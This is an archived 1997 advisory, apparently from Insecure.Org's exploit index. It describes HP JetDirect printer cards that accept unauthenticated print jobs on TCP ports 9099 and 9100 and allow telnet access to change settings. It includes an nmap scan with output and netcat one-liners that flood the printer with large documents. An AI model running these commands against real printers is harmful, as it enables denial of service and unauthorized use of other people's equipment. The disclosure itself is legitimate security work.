JetDirect printer card problem
|Description:||The JetDirect card with TCP/IP enabled will by default open high ports (9099 and 9100) which can be used to print arbitrary files|
|Author:||Klaus Steding-Jessen <jessen@AHAND.UNICAMP.BR>|
|Compromise:||DoS Attack (send 500 page documents), or free printing if you have access to the printer in question|
|Vulnerable Systems:||Those using JetDirect with TCP/IP enabled and the default unrestricted connections. |
|Date:||4 October 1997 |
|Notes:||Cool! He used my |
Date: Sat, 4 Oct 1997 18:02:01 -0300
From: Klaus Steding-Jessen <jessen@AHAND.UNICAMP.BR>
Subject: HP Laserjet 4M Plus DirectJet Problem
I don't know if this is a well known HP printer problem, but
I've found no references of it on the bugtraq archives.
It is possible to bypass lpd and page accounting on a HP
PostScript printer attached to an ethernet card sending PostScript
directly to tcp ports 9099 and 9100 from any machine over the network.
I've tested on a HP Laserjet 4M Plus DirectJet, connecting to
port 9099 or 9100 tcp and printing PostScript documents.
There is no way to tell the printer to accept connections only
from a range of valid IPs. Also, it is possible to telnet to the
printer and change the printer IP or disable logging. Protect the
printer inside a firewall appears to be the only safe way.
Find this kind of printer on a network is quite easy with a
good port scanner. It responds to ping and listens on tcp ports 23,
515, 9099 and 9100.
# nmap -P -s printer.foo.bar.org -p 23,515,9099,9100
Starting nmap V 1.25 by Fyodor (firstname.lastname@example.org, www.dhp.com/~fyodor/nmap/
Hint: The -v option notifies you of open ports as they are found.
Host printer.foo.bar.org (xx.yy.ww.zz) appears to be up ... good.
Open ports on printer.foo.bar.org (xx.yy.ww.zz):
Port Number Protocol Service
23 tcp telnet
515 tcp printer
9099 tcp unknown
9100 tcp unknown
To print a PostScript document just send it to port 9099 or
9100. Netcat will do:
$ nc printer.foo.bar.org 9099 < huge_document.ps
$ nc printer.foo.bar.org 9100 < huge_document.ps
Anyone can confirm this with other printers? I think HP 5M is
also vulnerable, but I've not tested.
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:
[ Nmap |
Sec Tools |
Mailing Lists |
Site News |